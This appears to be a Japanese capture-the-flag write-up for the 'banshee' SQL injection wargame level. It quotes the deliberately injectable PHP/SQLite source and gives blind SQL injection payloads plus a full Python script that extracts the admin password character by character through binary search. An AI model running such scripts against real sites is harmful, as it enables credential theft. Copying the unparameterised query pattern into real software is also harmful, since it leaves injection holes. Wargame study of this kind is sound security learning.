<?php include "./config.php"; login_chk(); $db = sqlite_open("./db/banshee.db"); if(preg_match('/sqlite|member|_/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from member where id='admin' and pw='{$_GET[pw]}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = sqlite_fetch_array(sqlite_query($db,$query)); if($result['id']) echo "<h2>login success!</h2>"; $query = "select pw from member where id='admin'"; $result = sqlite_fetch_array(sqlite_query($db,$query)); if($result['pw'] === $_GET['pw']) solve("banshee"); highlight_file(__FILE__);
特徴は以下。
- SQLite
- pwが入力可能
sqlite,member,_でフィルタリング
- adminのpwが知りたい
Blind SQL Injectionかなという感じ。
Blind SQL Injection
SQLiteではascii関数は使えないので、代わりにunicode関数を使用する。
以下で長さを抜き取る。
' or id='admin' and {md} <= length(pw) --
以下で中身を抜き取る。
' or id='admin' and {md} <= unicode(substr(pw,{i+1},1)) --
import requests
url = "https://los.rubiya.kr/chall/banshee_ecdfd1.php"
cookie = {'PHPSESSID': 'eofd5'}
def check(data) -> bool:
return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data)
ok = 0
ng = 60
while ok + 1 != ng:
md = (ok + ng) // 2
q = f"' or id='admin' and {md} <= length(pw) --"
res = requests.get(url, params={'pw': q}, cookies=cookie)
print(f"[+] try {md}")
if check(res.text):
ok = md
else:
ng = md
length = ok
print(f"[*] length = {length}")
ans = ""
for i in range(0, length):
ok = 0
ng = 256
while ok + 1 != ng:
md = (ok + ng) // 2
q = f"' or id='admin' and {md} <= unicode(substr(pw,{i+1},1)) --"
res = requests.get(url, params={'pw': q}, cookies=cookie)
print(f"[+] try {md}")
if check(res.text):
ok = md
else:
ng = md
ans += str(chr(ok))
print(f"[*] {ans}")
print(f"[*] find! {ans}")
